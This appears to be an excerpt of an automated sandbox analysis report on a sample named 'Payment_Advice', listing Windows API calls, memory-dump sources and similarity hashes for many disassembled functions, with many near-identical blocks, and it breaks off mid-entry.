• GetStdHandle.KERNEL32(000000F5,?,?,?,?,0050D343,00000001,?,?,?,00000000,0051551D,?,?,?), ref: 00509F9E
• WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0051551D,?,?,?,?,?,00514FC7,?), ref: 00509FE5
• WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0050D343,00000001,?,?), ref: 0050A011
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: FileWrite$Handle
• String ID:
• API String ID: 4209713984-0
• Opcode ID: cb0a63bc07fabc14a7bf8f1ae4688feab9b0276487da8da65ea7da7100a4ad0f
• Instruction ID: 03cd581648e118d1b56308f5b4f41f44a70128559e500ae8440c8982f2723515
• Opcode Fuzzy Hash: cb0a63bc07fabc14a7bf8f1ae4688feab9b0276487da8da65ea7da7100a4ad0f
• Instruction Fuzzy Hash: 2631B37120830AAFDB15CF20D818BAE7BA5FF94715F04491DF941972D1C775AD48CBA2
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0050C27E: _wcslen.LIBCMT ref: 0050C284
• CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0050A175,?,00000001,00000000,?,?), ref: 0050A2D9
• CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0050A175,?,00000001,00000000,?,?), ref: 0050A30C
• GetLastError.KERNEL32(?,?,?,?,0050A175,?,00000001,00000000,?,?), ref: 0050A329
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: CreateDirectory$ErrorLast_wcslen
• String ID:
• API String ID: 2260680371-0
• Opcode ID: d11cfe45c10aceea4750a19f31281bf71324109da77ccc347e593dd70cd789e9
• Instruction ID: a45e043f46cfa57c8545eae41788a624d5584947be6527bb4ce91f0ce06c72a4
• Opcode Fuzzy Hash: d11cfe45c10aceea4750a19f31281bf71324109da77ccc347e593dd70cd789e9
• Instruction Fuzzy Hash: 7801B1396003116AEF21AB758C4EBED3E88BF0A780F044864F901E61C1E764DA8186B6
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0052B8B8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: Info
• String ID:
• API String ID: 1807457897-3916222277
• Opcode ID: 9bf781c690b1ad97f8e678e984abec05bf8352f8678a4e2a3f1d026cb62abcba
• Instruction ID: bfcc73052d75d3e0bde1c470f419936684784cfc9992316e4507c63fe3ac6eee
• Opcode Fuzzy Hash: 9bf781c690b1ad97f8e678e984abec05bf8352f8678a4e2a3f1d026cb62abcba
• Instruction Fuzzy Hash: 2B41FB7150426C9AEF218E149C84BF6BFB9FF56304F1408EDE59986182D3359A85DB60
Uniqueness

Uniqueness Score: -1.00%

APIs
• LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 0052AFDD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: String
• String ID: LCMapStringEx
• API String ID: 2568140703-3893581201
• Opcode ID: 40655842e492336f6279070bad0940a7b77521a1bb0030fd0ef85bbe28bfc64b
• Instruction ID: 6615d5f81c30979de1c92625e506dc0b26e30345e3a0db92992189ea9e6a0590
• Opcode Fuzzy Hash: 40655842e492336f6279070bad0940a7b77521a1bb0030fd0ef85bbe28bfc64b
• Instruction Fuzzy Hash: 5801137650421EBBCF129F90ED06DEE7FA2FF49750F014254FE14662A0CA368A31AB81
Uniqueness

Uniqueness Score: -1.00%

APIs
• InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0052A56F), ref: 0052AF55
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: CountCriticalInitializeSectionSpin
• String ID: InitializeCriticalSectionEx
• API String ID: 2593887523-3084827643
• Opcode ID: 0632a9045d24742c6523ac53b682977375722a751ad1f706eeda6050db120d2b
• Instruction ID: acd5e0436b5671c0c5c5160cef6384709e6964508942ea46d5102c6d0f6a4d8b
• Opcode Fuzzy Hash: 0632a9045d24742c6523ac53b682977375722a751ad1f706eeda6050db120d2b
• Instruction Fuzzy Hash: 59F02472A4921CBBCB115F10DC06DAE7F60FF08711F004154FD08963A0DA314E10A785
Uniqueness

Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Alloc
                                                                                                    • String ID: FlsAlloc
                                                                                                    • API String ID: 2773662609-671089009
                                                                                                    • Opcode ID: 9fe8667b727e160fbb3ab17a49ef89a438c26745854d0a7dc51b78be38919dbb
                                                                                                    • Instruction ID: c7f9bcfa99e79a24e9adde7369a1d708d827aaee279e068667dc58e9e53b00dc
                                                                                                    • Opcode Fuzzy Hash: 9fe8667b727e160fbb3ab17a49ef89a438c26745854d0a7dc51b78be38919dbb
                                                                                                    • Instruction Fuzzy Hash: 4DE0AB72A4422C7BC310AB64EC07E6EBF90FF59B21F010298FC00A3380CD705E1096D6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: 106a9d713bf8107917705d41b85fe8ea9bd8b79d3506d7442b4bae74fb845f77
                                                                                                    • Instruction ID: 15e5445bdef4ee6ccaf507b8539047ef5f28c45d1c2f82dde2537209bf1f8a69
                                                                                                    • Opcode Fuzzy Hash: 106a9d713bf8107917705d41b85fe8ea9bd8b79d3506d7442b4bae74fb845f77
                                                                                                    • Instruction Fuzzy Hash: 32B012E9298101BC320411555C1BCB70E0CF4C3B10330883EFC02D1480D850ACC24431
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: 04e63464eaaa8cdfc9d01c89bcbf70980aa760034b7f37734fb05e1012f09616
                                                                                                    • Instruction ID: 8daa2254adf76149d9c192c47454849d85b1eb6707959199616890475af757ca
                                                                                                    • Opcode Fuzzy Hash: 04e63464eaaa8cdfc9d01c89bcbf70980aa760034b7f37734fb05e1012f09616
                                                                                                    • Instruction Fuzzy Hash: 09B012E5298001BC320456155C0BCB70E4CF4C3B20330C43EFC06C2180D850AC864531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: f80a18457502063f42b77f2d56f6a25972a72ed62c74e713c30b6a1295484278
                                                                                                    • Instruction ID: 8cbf986a883c9bfcf152979e2d87b7db721a3308226d9a2af81acbc0185eec61
                                                                                                    • Opcode Fuzzy Hash: f80a18457502063f42b77f2d56f6a25972a72ed62c74e713c30b6a1295484278
                                                                                                    • Instruction Fuzzy Hash: 7CB012E929C101BC320451595C0BCB70E4CF4C3B10330443EFC06C2080D8506CC24631
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: a193eb47a7ae3694963026a27f0274dbca0abe15c0629129a454e86a643df6b0
                                                                                                    • Instruction ID: 8892a90449f267db854b1cd1461938bba9551f85f4a4e2652d47b0e131e32261
                                                                                                    • Opcode Fuzzy Hash: a193eb47a7ae3694963026a27f0274dbca0abe15c0629129a454e86a643df6b0
                                                                                                    • Instruction Fuzzy Hash: B5B012F5299141BD324452151C0BCB70E4DF5C2B10730453EFC06C2080D8506CC64531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: bf52ff5af2e1e4e8f0c76c592ddcb23da25fbeed8bf9f92a2daa1e8abfd7ab47
                                                                                                    • Instruction ID: 069f3a94607af7cf7d318ebcff4da1b9f59d4e73dcaddb6c1eefce3c42bc3742
                                                                                                    • Opcode Fuzzy Hash: bf52ff5af2e1e4e8f0c76c592ddcb23da25fbeed8bf9f92a2daa1e8abfd7ab47
                                                                                                    • Instruction Fuzzy Hash: 78B012E5699041BC320451151C0BCB70E4DF5C3B10730843EFC06C2080D850AC824531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: 007004ed81f21cffa4479609bddaac18d20f54f2f342da72821c9505d79104dc
                                                                                                    • Instruction ID: 5384dc4e83b6ca79663681a40d7a47e4d54341789618cb837353d868322e3fdd
                                                                                                    • Opcode Fuzzy Hash: 007004ed81f21cffa4479609bddaac18d20f54f2f342da72821c9505d79104dc
                                                                                                    • Instruction Fuzzy Hash: 4BB012E52A9041BC320451151C0BCB70E8DF9C2B10730443EFC07C2080D8506C824531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: c066eb7889fec240e3ac14aa4ebc50b879d9dee224016beeb740c4c174e55071
                                                                                                    • Instruction ID: 4b01366ec7fcabff00d5ba7d3572063970f04a2d968a7294b921295ec7e00e2f
                                                                                                    • Opcode Fuzzy Hash: c066eb7889fec240e3ac14aa4ebc50b879d9dee224016beeb740c4c174e55071
                                                                                                    • Instruction Fuzzy Hash: 63B012E5298001BC321451251C0BCB70E8CF4C3B10330843EFC06C2080D950ECC24531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: 427259fe91a4c9c60fab2db052b8c001c3e233e4d1416d6d6a67c39a7e0229e3
                                                                                                    • Instruction ID: 8de907c26ac8b8cd3961b9995a85c750140242e6ab897d68354d2460fcfcc438
                                                                                                    • Opcode Fuzzy Hash: 427259fe91a4c9c60fab2db052b8c001c3e233e4d1416d6d6a67c39a7e0229e3
                                                                                                    • Instruction Fuzzy Hash: B7B012F5298001BC320451151C0BCB70E4CF5C3F10330853EFC06C2081D850AD864531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: b2258002cb88684139129e2b49ae9511e91650985b6f4a4d989e2faaf2059796
                                                                                                    • Instruction ID: 3ba457f38096c8965024044465f7807e0b25adff22028d9dd54e1ca008e71090
                                                                                                    • Opcode Fuzzy Hash: b2258002cb88684139129e2b49ae9511e91650985b6f4a4d989e2faaf2059796
                                                                                                    • Instruction Fuzzy Hash: 13B012E53A8141BD324452155C0BCB70E4CF4C2B20330853EFC06C2180D8506CC64531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
